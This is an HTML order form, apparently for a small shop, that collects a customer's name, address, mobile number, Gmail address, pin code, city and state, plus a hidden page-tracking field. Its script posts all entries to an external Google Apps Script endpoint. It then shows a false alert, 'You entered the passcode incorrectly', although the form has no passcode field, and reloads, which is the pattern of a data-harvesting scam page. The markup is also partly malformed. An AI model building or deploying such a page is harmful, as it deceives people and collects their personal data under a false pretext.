<html>
<head>
<title></title>
<style>
.hicod{
display:none;
}
</style>
</head>
<body bgcolor="#D8D8D8">
<div class="con" >
<div class="fore">
         <form method="post"" name="contactform" id="contactform">
<h1 class="ha">Costumer deteless</h1>
<input type="text" value="dete6.html" class="hicod" name="A1"  ></div>
<b class="fotx">Name </b>
<br>
<input type="text" size="19px" class="te" name="B1"></input>
<br>
<b class="fotx">Address </b>
<br>
<input type="text" size="19px" class="te" name="C1"></input><br>
<b class="fotx">Mobile Number </b>
<br>
<input type="number" size="19px" class="te" name="D1" style="width:590px;"></input><br>
<b class="fotx">Gmail Address</b>
<br>
<input type="gmail" class="te" name="E1" size="19px"></input><br>
<b class="fotx">pin code </b>
<br>
<input type="text" size="19px" class="te" name="F1" style="width:450px;"></input><br>
<b class="fotx">City </b>
<br>
<input type="text" size="19px" class="te" name="G1"></input> <br>
 <b class="fotx">state</b><br>
<input type="text" size="19px" class="te" name="H1" ></input><br>
<hr>
<h1 class="ha">Product Deteless</h1>
<b></b>
<br>
<b class="fotx">Size</b>
<input type="text" class="te" name="I1" style="width:100px;" value="01"></input>
<br>
<b><h1 class="ha">Payment method</h1></b>
<b class="chek"><p>Cash on delivery</b> <input type="checkbox" name="J1" value="Cash on delivery " class="chek1"></p> <br>
<input type="submit" value="submit data" class="sub" id="submit1">
<br><hr>
<div class="end"></div>
</div>
</form>
</div>
</div>
</body>
<style>
.te{
height:100px;
border-radius:px;
font-size:40px;
border-radius:30px;
width:900px;
}

.sub{
padding-top:5px;
padding-bottom:5px;
padding-left:255px;
padding-right:255px;
font-size:80px;
background:orange;
border:solid ;
}
.sub:hover{
padding-top:5px;
padding-bottom:5px;
padding-left:255px;
padding-right:255px;
font-size:80px;
background:green;
border:solid ;

}
.end{
height:8%;
width:100%;
}
.ls{
font-size:10px;
padding-left:38px;
padding-right:38px;
}
.fotx{
font-size:50px;
color:#0B4C5F;
}
.ha{
font-size:50px;
color:#610B38;
}
.chek{
font-size:50px;
}
.chek1{
font-size:100px;
}
</style>		  
		  <script>
		  const scriptURL = 'https://script.google.com/macros/s/AKfycbxlOQuld2H9xO8TTMUOaksCh8eZRCIk9A6O3lIb-KEEnJR1zpSw3ArxIcJ1ormmuvw/exec'
		  const form = document.forms['contactform']
		  
		  form.addEventListener('submit', e => {
		  e.preventDefault()
		  fetch(scriptURL, { method: 'POST', body: new FormData(form)})
		  .then(response => alert("You entered the passcode incorrectly." ))
		  .then(() => {  window.location.reload(); })
		  .catch(error => console.error('Error!', error.message))
		  })
		  </script>

</html>